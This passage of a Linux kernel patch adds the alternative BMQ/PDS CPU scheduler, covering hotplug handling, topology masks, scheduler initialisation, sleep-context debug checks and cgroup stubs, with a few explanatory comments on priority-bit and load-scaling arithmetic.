++	 * When going down, decrement the number of cores with SMT present.
++	 */
++	if (cpumask_weight(cpu_smt_mask(cpu)) == 2) {
++		static_branch_dec_cpuslocked(&sched_smt_present);
++		if (!static_branch_likely(&sched_smt_present))
++			cpumask_clear(&sched_sg_idle_mask);
++	}
++#endif
++
++	if (!sched_smp_initialized)
++		return 0;
++
++	ret = cpuset_cpu_inactive(cpu);
++	if (ret) {
++		balance_push_set(cpu, false);
++		set_cpu_active(cpu, true);
++		return ret;
++	}
++
++	return 0;
++}
++
++static void sched_rq_cpu_starting(unsigned int cpu)
++{
++	struct rq *rq = cpu_rq(cpu);
++
++	rq->calc_load_update = calc_load_update;
++}
++
++int sched_cpu_starting(unsigned int cpu)
++{
++	sched_rq_cpu_starting(cpu);
++	sched_tick_start(cpu);
++	return 0;
++}
++
++#ifdef CONFIG_HOTPLUG_CPU
++
++/*
++ * Invoked immediately before the stopper thread is invoked to bring the
++ * CPU down completely. At this point all per CPU kthreads except the
++ * hotplug thread (current) and the stopper thread (inactive) have been
++ * either parked or have been unbound from the outgoing CPU. Ensure that
++ * any of those which might be on the way out are gone.
++ *
++ * If after this point a bound task is being woken on this CPU then the
++ * responsible hotplug callback has failed to do its job.
++ * sched_cpu_dying() will catch it with the appropriate fireworks.
++ */
++int sched_cpu_wait_empty(unsigned int cpu)
++{
++	balance_hotplug_wait();
++	return 0;
++}
++
++/*
++ * Since this CPU is going 'away' for a while, fold any nr_active delta we
++ * might have. Called from the CPU stopper task after ensuring that the
++ * stopper is the last running task on the CPU, so nr_active count is
++ * stable. We need to take the teardown thread which is calling this into
++ * account, so we hand in adjust = 1 to the load calculation.
++ *
++ * Also see the comment "Global load-average calculations".
++ */
++static void calc_load_migrate(struct rq *rq)
++{
++	long delta = calc_load_fold_active(rq, 1);
++
++	if (delta)
++		atomic_long_add(delta, &calc_load_tasks);
++}
++
++static void dump_rq_tasks(struct rq *rq, const char *loglvl)
++{
++	struct task_struct *g, *p;
++	int cpu = cpu_of(rq);
++
++	lockdep_assert_held(&rq->lock);
++
++	printk("%sCPU%d enqueued tasks (%u total):\n", loglvl, cpu, rq->nr_running);
++	for_each_process_thread(g, p) {
++		if (task_cpu(p) != cpu)
++			continue;
++
++		if (!task_on_rq_queued(p))
++			continue;
++
++		printk("%s\tpid: %d, name: %s\n", loglvl, p->pid, p->comm);
++	}
++}
++
++int sched_cpu_dying(unsigned int cpu)
++{
++	struct rq *rq = cpu_rq(cpu);
++	unsigned long flags;
++
++	/* Handle pending wakeups and then migrate everything off */
++	sched_tick_stop(cpu);
++
++	raw_spin_lock_irqsave(&rq->lock, flags);
++	if (rq->nr_running != 1 || rq_has_pinned_tasks(rq)) {
++		WARN(true, "Dying CPU not properly vacated!");
++		dump_rq_tasks(rq, KERN_WARNING);
++	}
++	raw_spin_unlock_irqrestore(&rq->lock, flags);
++
++	calc_load_migrate(rq);
++	hrtick_clear(rq);
++	return 0;
++}
++#endif
++
++#ifdef CONFIG_SMP
++static void sched_init_topology_cpumask_early(void)
++{
++	int cpu;
++	cpumask_t *tmp;
++
++	for_each_possible_cpu(cpu) {
++		/* init topo masks */
++		tmp = per_cpu(sched_cpu_topo_masks, cpu);
++
++		cpumask_copy(tmp, cpumask_of(cpu));
++		tmp++;
++		cpumask_copy(tmp, cpu_possible_mask);
++		per_cpu(sched_cpu_llc_mask, cpu) = tmp;
++		per_cpu(sched_cpu_topo_end_mask, cpu) = ++tmp;
++		/*per_cpu(sd_llc_id, cpu) = cpu;*/
++	}
++}
++
++#define TOPOLOGY_CPUMASK(name, mask, last)\
++	if (cpumask_and(topo, topo, mask)) {					\
++		cpumask_copy(topo, mask);					\
++		printk(KERN_INFO "sched: cpu#%02d topo: 0x%08lx - "#name,	\
++		       cpu, (topo++)->bits[0]);					\
++	}									\
++	if (!last)								\
++		cpumask_complement(topo, mask)
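++
++/*
++ * Illustrative only: for the SMT level the macro expands roughly to
++ *
++ *	if (cpumask_and(topo, topo, topology_sibling_cpumask(cpu))) {
++ *		cpumask_copy(topo, topology_sibling_cpumask(cpu));
++ *		printk(...);	// log this level, then advance topo
++ *	}
++ *	cpumask_complement(topo, topology_sibling_cpumask(cpu));
++ *
++ * building, per CPU, a widening chain of masks from SMT siblings out
++ * to all online CPUs.
++ */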
++
++static void sched_init_topology_cpumask(void)
++{
++	int cpu;
++	cpumask_t *topo;
++
++	for_each_online_cpu(cpu) {
++		/* take the chance to reset the time slice for idle tasks */
++		cpu_rq(cpu)->idle->time_slice = sched_timeslice_ns;
++
++		topo = per_cpu(sched_cpu_topo_masks, cpu) + 1;
++
++		cpumask_complement(topo, cpumask_of(cpu));
++#ifdef CONFIG_SCHED_SMT
++		TOPOLOGY_CPUMASK(smt, topology_sibling_cpumask(cpu), false);
++#endif
++		per_cpu(sd_llc_id, cpu) = cpumask_first(cpu_coregroup_mask(cpu));
++		per_cpu(sched_cpu_llc_mask, cpu) = topo;
++		TOPOLOGY_CPUMASK(coregroup, cpu_coregroup_mask(cpu), false);
++
++		TOPOLOGY_CPUMASK(core, topology_core_cpumask(cpu), false);
++
++		TOPOLOGY_CPUMASK(others, cpu_online_mask, true);
++
++		per_cpu(sched_cpu_topo_end_mask, cpu) = topo;
++		printk(KERN_INFO "sched: cpu#%02d llc_id = %d, llc_mask idx = %d\n",
++		       cpu, per_cpu(sd_llc_id, cpu),
++		       (int) (per_cpu(sched_cpu_llc_mask, cpu) -
++			      per_cpu(sched_cpu_topo_masks, cpu)));
++	}
++}
++#endif
++
++void __init sched_init_smp(void)
++{
++	/* Move init over to a non-isolated CPU */
++	if (set_cpus_allowed_ptr(current, housekeeping_cpumask(HK_TYPE_DOMAIN)) < 0)
++		BUG();
++	current->flags &= ~PF_NO_SETAFFINITY;
++
++	sched_init_topology_cpumask();
++
++	sched_smp_initialized = true;
++}
++
++static int __init migration_init(void)
++{
++	sched_cpu_starting(smp_processor_id());
++	return 0;
++}
++early_initcall(migration_init);
++
++#else
++void __init sched_init_smp(void)
++{
++	cpu_rq(0)->idle->time_slice = sched_timeslice_ns;
++}
++#endif /* CONFIG_SMP */
++
++int in_sched_functions(unsigned long addr)
++{
++	return in_lock_functions(addr) ||
++		(addr >= (unsigned long)__sched_text_start
++		&& addr < (unsigned long)__sched_text_end);
++}
++
++#ifdef CONFIG_CGROUP_SCHED
++/* task group related information */
++struct task_group {
++	struct cgroup_subsys_state css;
++
++	struct rcu_head rcu;
++	struct list_head list;
++
++	struct task_group *parent;
++	struct list_head siblings;
++	struct list_head children;
++#ifdef CONFIG_FAIR_GROUP_SCHED
++	unsigned long		shares;
++#endif
++};
++
++/*
++ * Default task group.
++ * Every task in the system belongs to this group at bootup.
++ */
++struct task_group root_task_group;
++LIST_HEAD(task_groups);
++
++/* Cacheline aligned slab cache for task_group */
++static struct kmem_cache *task_group_cache __read_mostly;
++#endif /* CONFIG_CGROUP_SCHED */
++
++void __init sched_init(void)
++{
++	int i;
++	struct rq *rq;
++
++	printk(KERN_INFO ALT_SCHED_VERSION_MSG);
++
++	wait_bit_init();
++
++#ifdef CONFIG_SMP
++	for (i = 0; i < SCHED_QUEUE_BITS; i++)
++		cpumask_copy(sched_preempt_mask + i, cpu_present_mask);
++#endif
++
++#ifdef CONFIG_CGROUP_SCHED
++	task_group_cache = KMEM_CACHE(task_group, 0);
++
++	list_add(&root_task_group.list, &task_groups);
++	INIT_LIST_HEAD(&root_task_group.children);
++	INIT_LIST_HEAD(&root_task_group.siblings);
++#endif /* CONFIG_CGROUP_SCHED */
++	for_each_possible_cpu(i) {
++		rq = cpu_rq(i);
++
++		sched_queue_init(&rq->queue);
++		rq->prio = IDLE_TASK_SCHED_PRIO;
++		rq->skip = NULL;
++
++		raw_spin_lock_init(&rq->lock);
++		rq->nr_running = rq->nr_uninterruptible = 0;
++		rq->calc_load_active = 0;
++		rq->calc_load_update = jiffies + LOAD_FREQ;
++#ifdef CONFIG_SMP
++		rq->online = false;
++		rq->cpu = i;
++
++#ifdef CONFIG_SCHED_SMT
++		rq->active_balance = 0;
++#endif
++
++#ifdef CONFIG_NO_HZ_COMMON
++		INIT_CSD(&rq->nohz_csd, nohz_csd_func, rq);
++#endif
++		rq->balance_callback = &balance_push_callback;
++#ifdef CONFIG_HOTPLUG_CPU
++		rcuwait_init(&rq->hotplug_wait);
++#endif
++#endif /* CONFIG_SMP */
++		rq->nr_switches = 0;
++
++		hrtick_rq_init(rq);
++		atomic_set(&rq->nr_iowait, 0);
++	}
++#ifdef CONFIG_SMP
++	/* Set rq->online for cpu 0 */
++	cpu_rq(0)->online = true;
++#endif
++	/*
++	 * The boot idle thread does lazy MMU switching as well:
++	 */
++	mmgrab(&init_mm);
++	enter_lazy_tlb(&init_mm, current);
++
++	/*
++	 * The idle task doesn't need the kthread struct to function, but it
++	 * is dressed up as a per-CPU kthread and thus needs to play the part
++	 * if we want to avoid special-casing it in code that deals with per-CPU
++	 * kthreads.
++	 */
++	WARN_ON(!set_kthread_struct(current));
++
++	/*
++	 * Make us the idle thread. Technically, schedule() should not be
++	 * called from this thread, however somewhere below it might be,
++	 * but because we are the idle thread, we just pick up running again
++	 * when this runqueue becomes "idle".
++	 */
++	init_idle(current, smp_processor_id());
++
++	calc_load_update = jiffies + LOAD_FREQ;
++
++#ifdef CONFIG_SMP
++	idle_thread_set_boot_cpu();
++	balance_push_set(smp_processor_id(), false);
++
++	sched_init_topology_cpumask_early();
++#endif /* SMP */
++
++	psi_init();
++
++	preempt_dynamic_init();
++}
++
++#ifdef CONFIG_DEBUG_ATOMIC_SLEEP
++
++void __might_sleep(const char *file, int line)
++{
++	unsigned int state = get_current_state();
++	/*
++	 * Blocking primitives will set (and therefore destroy) current->state,
++	 * since we will exit with TASK_RUNNING make sure we enter with it,
++	 * otherwise we will destroy state.
++	 */
++	WARN_ONCE(state != TASK_RUNNING && current->task_state_change,
++			"do not call blocking ops when !TASK_RUNNING; "
++			"state=%x set at [<%p>] %pS\n", state,
++			(void *)current->task_state_change,
++			(void *)current->task_state_change);
++
++	__might_resched(file, line, 0);
++}
++EXPORT_SYMBOL(__might_sleep);
++
++static void print_preempt_disable_ip(int preempt_offset, unsigned long ip)
++{
++	if (!IS_ENABLED(CONFIG_DEBUG_PREEMPT))
++		return;
++
++	if (preempt_count() == preempt_offset)
++		return;
++
++	pr_err("Preemption disabled at:");
++	print_ip_sym(KERN_ERR, ip);
++}
++
++static inline bool resched_offsets_ok(unsigned int offsets)
++{
++	unsigned int nested = preempt_count();
++
++	nested += rcu_preempt_depth() << MIGHT_RESCHED_RCU_SHIFT;
++
++	return nested == offsets;
++}
++
++void __might_resched(const char *file, int line, unsigned int offsets)
++{
++	/* Ratelimiting timestamp: */
++	static unsigned long prev_jiffy;
++
++	unsigned long preempt_disable_ip;
++
++	/* WARN_ON_ONCE() by default, no rate limit required: */
++	rcu_sleep_check();
++
++	if ((resched_offsets_ok(offsets) && !irqs_disabled() &&
++	     !is_idle_task(current) && !current->non_block_count) ||
++	    system_state == SYSTEM_BOOTING || system_state > SYSTEM_RUNNING ||
++	    oops_in_progress)
++		return;
++	if (time_before(jiffies, prev_jiffy + HZ) && prev_jiffy)
++		return;
++	prev_jiffy = jiffies;
++
++	/* Save this before calling printk(), since that will clobber it: */
++	preempt_disable_ip = get_preempt_disable_ip(current);
++
++	pr_err("BUG: sleeping function called from invalid context at %s:%d\n",
++	       file, line);
++	pr_err("in_atomic(): %d, irqs_disabled(): %d, non_block: %d, pid: %d, name: %s\n",
++	       in_atomic(), irqs_disabled(), current->non_block_count,
++	       current->pid, current->comm);
++	pr_err("preempt_count: %x, expected: %x\n", preempt_count(),
++	       offsets & MIGHT_RESCHED_PREEMPT_MASK);
++
++	if (IS_ENABLED(CONFIG_PREEMPT_RCU)) {
++		pr_err("RCU nest depth: %d, expected: %u\n",
++		       rcu_preempt_depth(), offsets >> MIGHT_RESCHED_RCU_SHIFT);
++	}
++
++	if (task_stack_end_corrupted(current))
++		pr_emerg("Thread overran stack, or stack corrupted\n");
++
++	debug_show_held_locks(current);
++	if (irqs_disabled())
++		print_irqtrace_events(current);
++
++	print_preempt_disable_ip(offsets & MIGHT_RESCHED_PREEMPT_MASK,
++				 preempt_disable_ip);
++
++	dump_stack();
++	add_taint(TAINT_WARN, LOCKDEP_STILL_OK);
++}
++EXPORT_SYMBOL(__might_resched);
++
++void __cant_sleep(const char *file, int line, int preempt_offset)
++{
++	static unsigned long prev_jiffy;
++
++	if (irqs_disabled())
++		return;
++
++	if (!IS_ENABLED(CONFIG_PREEMPT_COUNT))
++		return;
++
++	if (preempt_count() > preempt_offset)
++		return;
++
++	if (time_before(jiffies, prev_jiffy + HZ) && prev_jiffy)
++		return;
++	prev_jiffy = jiffies;
++
++	printk(KERN_ERR "BUG: assuming atomic context at %s:%d\n", file, line);
++	printk(KERN_ERR "in_atomic(): %d, irqs_disabled(): %d, pid: %d, name: %s\n",
++			in_atomic(), irqs_disabled(),
++			current->pid, current->comm);
++
++	debug_show_held_locks(current);
++	dump_stack();
++	add_taint(TAINT_WARN, LOCKDEP_STILL_OK);
++}
++EXPORT_SYMBOL_GPL(__cant_sleep);
++
++#ifdef CONFIG_SMP
++void __cant_migrate(const char *file, int line)
++{
++	static unsigned long prev_jiffy;
++
++	if (irqs_disabled())
++		return;
++
++	if (is_migration_disabled(current))
++		return;
++
++	if (!IS_ENABLED(CONFIG_PREEMPT_COUNT))
++		return;
++
++	if (preempt_count() > 0)
++		return;
++
++	if (current->migration_flags & MDF_FORCE_ENABLED)
++		return;
++
++	if (time_before(jiffies, prev_jiffy + HZ) && prev_jiffy)
++		return;
++	prev_jiffy = jiffies;
++
++	pr_err("BUG: assuming non migratable context at %s:%d\n", file, line);
++	pr_err("in_atomic(): %d, irqs_disabled(): %d, migration_disabled() %u pid: %d, name: %s\n",
++	       in_atomic(), irqs_disabled(), is_migration_disabled(current),
++	       current->pid, current->comm);
++
++	debug_show_held_locks(current);
++	dump_stack();
++	add_taint(TAINT_WARN, LOCKDEP_STILL_OK);
++}
++EXPORT_SYMBOL_GPL(__cant_migrate);
++#endif
++#endif
++
++#ifdef CONFIG_MAGIC_SYSRQ
++void normalize_rt_tasks(void)
++{
++	struct task_struct *g, *p;
++	struct sched_attr attr = {
++		.sched_policy = SCHED_NORMAL,
++	};
++
++	read_lock(&tasklist_lock);
++	for_each_process_thread(g, p) {
++		/*
++		 * Only normalize user tasks:
++		 */
++		if (p->flags & PF_KTHREAD)
++			continue;
++
++		schedstat_set(p->stats.wait_start,  0);
++		schedstat_set(p->stats.sleep_start, 0);
++		schedstat_set(p->stats.block_start, 0);
++
++		if (!rt_task(p)) {
++			/*
++			 * Renice negative nice level userspace
++			 * tasks back to 0:
++			 */
++			if (task_nice(p) < 0)
++				set_user_nice(p, 0);
++			continue;
++		}
++
++		__sched_setscheduler(p, &attr, false, false);
++	}
++	read_unlock(&tasklist_lock);
++}
++#endif /* CONFIG_MAGIC_SYSRQ */
++
++#if defined(CONFIG_IA64) || defined(CONFIG_KGDB_KDB)
++/*
++ * These functions are only useful for the IA64 MCA handling, or kdb.
++ *
++ * They can only be called when the whole system has been
++ * stopped - every CPU needs to be quiescent, and no scheduling
++ * activity can take place. Using them for anything else would
++ * be a serious bug, and as a result, they aren't even visible
++ * under any other configuration.
++ */
++
++/**
++ * curr_task - return the current task for a given CPU.
++ * @cpu: the processor in question.
++ *
++ * ONLY VALID WHEN THE WHOLE SYSTEM IS STOPPED!
++ *
++ * Return: The current task for @cpu.
++ */
++struct task_struct *curr_task(int cpu)
++{
++	return cpu_curr(cpu);
++}
++
++#endif /* defined(CONFIG_IA64) || defined(CONFIG_KGDB_KDB) */
++
++#ifdef CONFIG_IA64
++/**
++ * ia64_set_curr_task - set the current task for a given CPU.
++ * @cpu: the processor in question.
++ * @p: the task pointer to set.
++ *
++ * Description: This function must only be used when non-maskable interrupts
++ * are serviced on a separate stack.  It allows the architecture to switch the
++ * notion of the current task on a CPU in a non-blocking manner.  This function
++ * must be called with all CPUs synchronised and interrupts disabled; the
++ * caller must save the original value of the current task (see
++ * curr_task() above) and restore that value before reenabling interrupts and
++ * re-starting the system.
++ *
++ * ONLY VALID WHEN THE WHOLE SYSTEM IS STOPPED!
++ */
++void ia64_set_curr_task(int cpu, struct task_struct *p)
++{
++	cpu_curr(cpu) = p;
++}
++
++#endif
++
++#ifdef CONFIG_CGROUP_SCHED
++static void sched_free_group(struct task_group *tg)
++{
++	kmem_cache_free(task_group_cache, tg);
++}
++
++static void sched_free_group_rcu(struct rcu_head *rhp)
++{
++	sched_free_group(container_of(rhp, struct task_group, rcu));
++}
++
++static void sched_unregister_group(struct task_group *tg)
++{
++	/*
++	 * We have to wait for yet another RCU grace period to expire, as
++	 * print_cfs_stats() might run concurrently.
++	 */
++	call_rcu(&tg->rcu, sched_free_group_rcu);
++}
++
++/* allocate runqueue etc for a new task group */
++struct task_group *sched_create_group(struct task_group *parent)
++{
++	struct task_group *tg;
++
++	tg = kmem_cache_alloc(task_group_cache, GFP_KERNEL | __GFP_ZERO);
++	if (!tg)
++		return ERR_PTR(-ENOMEM);
++
++	return tg;
++}
++
++void sched_online_group(struct task_group *tg, struct task_group *parent)
++{
++}
++
++/* rcu callback to free various structures associated with a task group */
++static void sched_unregister_group_rcu(struct rcu_head *rhp)
++{
++	/* Now it should be safe to free those cfs_rqs: */
++	sched_unregister_group(container_of(rhp, struct task_group, rcu));
++}
++
++void sched_destroy_group(struct task_group *tg)
++{
++	/* Wait for possible concurrent references to cfs_rqs to complete: */
++	call_rcu(&tg->rcu, sched_unregister_group_rcu);
++}
++
++void sched_release_group(struct task_group *tg)
++{
++}
++
++static inline struct task_group *css_tg(struct cgroup_subsys_state *css)
++{
++	return css ? container_of(css, struct task_group, css) : NULL;
++}
++
++static struct cgroup_subsys_state *
++cpu_cgroup_css_alloc(struct cgroup_subsys_state *parent_css)
++{
++	struct task_group *parent = css_tg(parent_css);
++	struct task_group *tg;
++
++	if (!parent) {
++		/* This is early initialization for the top cgroup */
++		return &root_task_group.css;
++	}
++
++	tg = sched_create_group(parent);
++	if (IS_ERR(tg))
++		return ERR_PTR(-ENOMEM);
++	return &tg->css;
++}
++
++/* Expose task group only after completing cgroup initialization */
++static int cpu_cgroup_css_online(struct cgroup_subsys_state *css)
++{
++	struct task_group *tg = css_tg(css);
++	struct task_group *parent = css_tg(css->parent);
++
++	if (parent)
++		sched_online_group(tg, parent);
++	return 0;
++}
++
++static void cpu_cgroup_css_released(struct cgroup_subsys_state *css)
++{
++	struct task_group *tg = css_tg(css);
++
++	sched_release_group(tg);
++}
++
++static void cpu_cgroup_css_free(struct cgroup_subsys_state *css)
++{
++	struct task_group *tg = css_tg(css);
++
++	/*
++	 * Relies on the RCU grace period between css_released() and this.
++	 */
++	sched_unregister_group(tg);
++}
++
++#ifdef CONFIG_RT_GROUP_SCHED
++static int cpu_cgroup_can_attach(struct cgroup_taskset *tset)
++{
++	return 0;
++}
++#endif
++
++static void cpu_cgroup_attach(struct cgroup_taskset *tset)
++{
++}
++
++#ifdef CONFIG_FAIR_GROUP_SCHED
++static DEFINE_MUTEX(shares_mutex);
++
++int sched_group_set_shares(struct task_group *tg, unsigned long shares)
++{
++	/*
++	 * We can't change the weight of the root cgroup.
++	 */
++	if (&root_task_group == tg)
++		return -EINVAL;
++
++	shares = clamp(shares, scale_load(MIN_SHARES), scale_load(MAX_SHARES));
++
++	mutex_lock(&shares_mutex);
++	if (tg->shares == shares)
++		goto done;
++
++	tg->shares = shares;
++done:
++	mutex_unlock(&shares_mutex);
++	return 0;
++}
++
++static int cpu_shares_write_u64(struct cgroup_subsys_state *css,
++				struct cftype *cftype, u64 shareval)
++{
++	if (shareval > scale_load_down(ULONG_MAX))
++		shareval = MAX_SHARES;
++	return sched_group_set_shares(css_tg(css), scale_load(shareval));
++}
++
++static u64 cpu_shares_read_u64(struct cgroup_subsys_state *css,
++			       struct cftype *cft)
++{
++	struct task_group *tg = css_tg(css);
++
++	return (u64) scale_load_down(tg->shares);
++}
++#endif
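++
++/*
++ * Illustrative only, not part of the patched kernel: "shares" is the
++ * cgroup-v1 knob registered below. Although this scheduler only
++ * stores the value, the file stays writable; a sketch assuming a v1
++ * cpu controller mounted at /sys/fs/cgroup/cpu with a "mygroup"
++ * hierarchy (both placeholders):
++ *
++ *	FILE *f = fopen("/sys/fs/cgroup/cpu/mygroup/cpu.shares", "w");
++ *	if (f) {
++ *		fprintf(f, "%u", 2048);	// 2x the 1024 default weight
++ *		fclose(f);
++ *	}
++ */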
++
++static struct cftype cpu_legacy_files[] = {
++#ifdef CONFIG_FAIR_GROUP_SCHED
++	{
++		.name = "shares",
++		.read_u64 = cpu_shares_read_u64,
++		.write_u64 = cpu_shares_write_u64,
++	},
++#endif
++	{ }	/* Terminate */
++};
++
++
++static struct cftype cpu_files[] = {
++	{ }	/* terminate */
++};
++
++static int cpu_extra_stat_show(struct seq_file *sf,
++			       struct cgroup_subsys_state *css)
++{
++	return 0;
++}
++
++struct cgroup_subsys cpu_cgrp_subsys = {
++	.css_alloc	= cpu_cgroup_css_alloc,
++	.css_online	= cpu_cgroup_css_online,
++	.css_released	= cpu_cgroup_css_released,
++	.css_free	= cpu_cgroup_css_free,
++	.css_extra_stat_show = cpu_extra_stat_show,
++#ifdef CONFIG_RT_GROUP_SCHED
++	.can_attach	= cpu_cgroup_can_attach,
++#endif
++	.attach		= cpu_cgroup_attach,
++	.legacy_cftypes	= cpu_legacy_files,
++	.dfl_cftypes	= cpu_files,
++	.early_init	= true,
++	.threaded	= true,
++};
++#endif	/* CONFIG_CGROUP_SCHED */
++
++#undef CREATE_TRACE_POINTS
+diff --git a/kernel/sched/alt_debug.c b/kernel/sched/alt_debug.c
+new file mode 100644
+index 000000000000..1212a031700e
+--- /dev/null
++++ b/kernel/sched/alt_debug.c
+@@ -0,0 +1,31 @@
++/*
++ * kernel/sched/alt_debug.c
++ *
++ * Print the alt scheduler debugging details
++ *
++ * Author: Alfred Chen
++ * Date  : 2020
++ */
++#include "sched.h"
++
++/*
++ * This allows printing both to /proc/sched_debug and
++ * to the console
++ */
++#define SEQ_printf(m, x...)			\
++ do {						\
++	if (m)					\
++		seq_printf(m, x);		\
++	else					\
++		pr_cont(x);			\
++ } while (0)
++
++void proc_sched_show_task(struct task_struct *p, struct pid_namespace *ns,
++			  struct seq_file *m)
++{
++	SEQ_printf(m, "%s (%d, #threads: %d)\n", p->comm, task_pid_nr_ns(p, ns),
++						get_nr_threads(p));
++}
++
++void proc_sched_set_task(struct task_struct *p)
++{}
+diff --git a/kernel/sched/alt_sched.h b/kernel/sched/alt_sched.h
+new file mode 100644
+index 000000000000..c32403ed82b6
+--- /dev/null
++++ b/kernel/sched/alt_sched.h
+@@ -0,0 +1,668 @@
++#ifndef ALT_SCHED_H
++#define ALT_SCHED_H
++
++#include <linux/context_tracking.h>
++#include <linux/profile.h>
++#include <linux/psi.h>
++#include <linux/stop_machine.h>
++#include <linux/syscalls.h>
++#include <linux/tick.h>
++
++#include <trace/events/power.h>
++#include <trace/events/sched.h>
++
++#include "../workqueue_internal.h"
++
++#include "cpupri.h"
++
++#ifdef CONFIG_SCHED_BMQ
++/* bits:
++ * RT(0-99), (Low prio adj range, nice width, high prio adj range) / 2, cpu idle task */
++#define SCHED_BITS	(MAX_RT_PRIO + NICE_WIDTH / 2 + MAX_PRIORITY_ADJ + 1)
++#endif
++
++#ifdef CONFIG_SCHED_PDS
++/* bits: RT(0-99), reserved(100-127), NORMAL_PRIO_NUM, cpu idle task */
++#define SCHED_BITS	(MIN_NORMAL_PRIO + NORMAL_PRIO_NUM + 1)
++#endif /* CONFIG_SCHED_PDS */
++
++#define IDLE_TASK_SCHED_PRIO	(SCHED_BITS - 1)
++
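
/*
 * Worked example (a sketch; the constants come from the
 * include/linux/sched/prio.h hunk quoted later in this thread): for BMQ,
 * MAX_RT_PRIO = 100, NICE_WIDTH = 40 and MAX_PRIORITY_ADJ = 7 give
 * SCHED_BITS = 100 + 40/2 + 7 + 1 = 128, so the idle task sits at
 * priority 127 and the 127-bit queue bitmap fits in two 64-bit words.
 * For PDS, MIN_NORMAL_PRIO = 128 and NORMAL_PRIO_NUM = 64 give
 * SCHED_BITS = 128 + 64 + 1 = 193, and the 64 normal priorities fill
 * bitmap word 2, which is why the pds.h hunk below shifts
 * rq->queue.bitmap[2] directly.
 */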
++#ifdef CONFIG_SCHED_DEBUG
++# define SCHED_WARN_ON(x)	WARN_ONCE(x, #x)
++extern void resched_latency_warn(int cpu, u64 latency);
++#else
++# define SCHED_WARN_ON(x)	({ (void)(x), 0; })
++static inline void resched_latency_warn(int cpu, u64 latency) {}
++#endif
++
++/*
++ * Increase resolution of nice-level calculations for 64-bit architectures.
++ * The extra resolution improves shares distribution and load balancing of
++ * low-weight task groups (eg. nice +19 on an autogroup), deeper taskgroup
++ * hierarchies, especially on larger systems. This is not a user-visible change
++ * and does not change the user-interface for setting shares/weights.
++ *
++ * We increase resolution only if we have enough bits to allow this increased
++ * resolution (i.e. 64-bit). The costs for increasing resolution when 32-bit
++ * are pretty high and the returns do not justify the increased costs.
++ *
++ * Really only required when CONFIG_FAIR_GROUP_SCHED=y is also set, but to
++ * increase coverage and consistency always enable it on 64-bit platforms.
++ */
++#ifdef CONFIG_64BIT
++# define NICE_0_LOAD_SHIFT	(SCHED_FIXEDPOINT_SHIFT + SCHED_FIXEDPOINT_SHIFT)
++# define scale_load(w)		((w) << SCHED_FIXEDPOINT_SHIFT)
++# define scale_load_down(w) \
++({ \
++	unsigned long __w = (w); \
++	if (__w) \
++		__w = max(2UL, __w >> SCHED_FIXEDPOINT_SHIFT); \
++	__w; \
++})
++#else
++# define NICE_0_LOAD_SHIFT	(SCHED_FIXEDPOINT_SHIFT)
++# define scale_load(w)		(w)
++# define scale_load_down(w)	(w)
++#endif
++
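
/*
 * Worked example (a sketch, not patch code): SCHED_FIXEDPOINT_SHIFT is
 * 10, so on 64-bit a nice-0 weight of 1024 becomes
 * scale_load(1024) == 1024 << 10 == 1048576, and
 * scale_load_down(1048576) == max(2UL, 1048576 >> 10) == 1024.  The
 * max(2UL, ...) clamp keeps a heavily shared low-weight group from
 * rounding down to the 0 or 1 weights the comment below warns about.
 */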
++#ifdef CONFIG_FAIR_GROUP_SCHED
++#define ROOT_TASK_GROUP_LOAD	NICE_0_LOAD
++
++/*
++ * A weight of 0 or 1 can cause arithmetic problems.
++ * The weight of a cfs_rq is the sum of the weights of the entities
++ * queued on it, so the weight of an entity should not be too large,
++ * and neither should the shares value of a task group.
++ * (The default weight is 1024 - so there's no practical
++ *  limitation from this.)
++ */
++#define MIN_SHARES		(1UL <<  1)
++#define MAX_SHARES		(1UL << 18)
++#endif
++
++/*
++ * Tunables that become constants when CONFIG_SCHED_DEBUG is off:
++ */
++#ifdef CONFIG_SCHED_DEBUG
++# define const_debug __read_mostly
++#else
++# define const_debug const
++#endif
++
++/* task_struct::on_rq states: */
++#define TASK_ON_RQ_QUEUED	1
++#define TASK_ON_RQ_MIGRATING	2
++
++static inline int task_on_rq_queued(struct task_struct *p)
++{
++	return p->on_rq == TASK_ON_RQ_QUEUED;
++}
++
++static inline int task_on_rq_migrating(struct task_struct *p)
++{
++	return READ_ONCE(p->on_rq) == TASK_ON_RQ_MIGRATING;
++}
++
++/*
++ * wake flags
++ */
++#define WF_SYNC		0x01		/* waker goes to sleep after wakeup */
++#define WF_FORK		0x02		/* child wakeup after fork */
++#define WF_MIGRATED	0x04		/* internal use, task got migrated */
++
++#define SCHED_QUEUE_BITS	(SCHED_BITS - 1)
++
++struct sched_queue {
++	DECLARE_BITMAP(bitmap, SCHED_QUEUE_BITS);
++	struct list_head heads[SCHED_BITS];
++};
++
++struct rq;
++struct balance_callback {
++	struct balance_callback *next;
++	void (*func)(struct rq *rq);
++};
++
++/*
++ * This is the main, per-CPU runqueue data structure.
++ * This data should only be modified by the local cpu.
++ */
++struct rq {
++	/* runqueue lock: */
++	raw_spinlock_t lock;
++
++	struct task_struct __rcu *curr;
++	struct task_struct *idle, *stop, *skip;
++	struct mm_struct *prev_mm;
++
++	struct sched_queue	queue;
++#ifdef CONFIG_SCHED_PDS
++	u64			time_edge;
++#endif
++	unsigned long prio;
++
++	/* switch count */
++	u64 nr_switches;
++
++	atomic_t nr_iowait;
++
++#ifdef CONFIG_SCHED_DEBUG
++	u64 last_seen_need_resched_ns;
++	int ticks_without_resched;
++#endif
++
++#ifdef CONFIG_MEMBARRIER
++	int membarrier_state;
++#endif
++
++#ifdef CONFIG_SMP
++	int cpu;		/* cpu of this runqueue */
++	bool online;
++
++	unsigned int		ttwu_pending;
++	unsigned char		nohz_idle_balance;
++	unsigned char		idle_balance;
++
++#ifdef CONFIG_HAVE_SCHED_AVG_IRQ
++	struct sched_avg	avg_irq;
++#endif
++
++#ifdef CONFIG_SCHED_SMT
++	int active_balance;
++	struct cpu_stop_work	active_balance_work;
++#endif
++	struct balance_callback	*balance_callback;
++#ifdef CONFIG_HOTPLUG_CPU
++	struct rcuwait		hotplug_wait;
++#endif
++	unsigned int		nr_pinned;
++
++#endif /* CONFIG_SMP */
++#ifdef CONFIG_IRQ_TIME_ACCOUNTING
++	u64 prev_irq_time;
++#endif /* CONFIG_IRQ_TIME_ACCOUNTING */
++#ifdef CONFIG_PARAVIRT
++	u64 prev_steal_time;
++#endif /* CONFIG_PARAVIRT */
++#ifdef CONFIG_PARAVIRT_TIME_ACCOUNTING
++	u64 prev_steal_time_rq;
++#endif /* CONFIG_PARAVIRT_TIME_ACCOUNTING */
++
++	/* For general cpu load util */
++	s32 load_history;
++	u64 load_block;
++	u64 load_stamp;
++
++	/* calc_load related fields */
++	unsigned long calc_load_update;
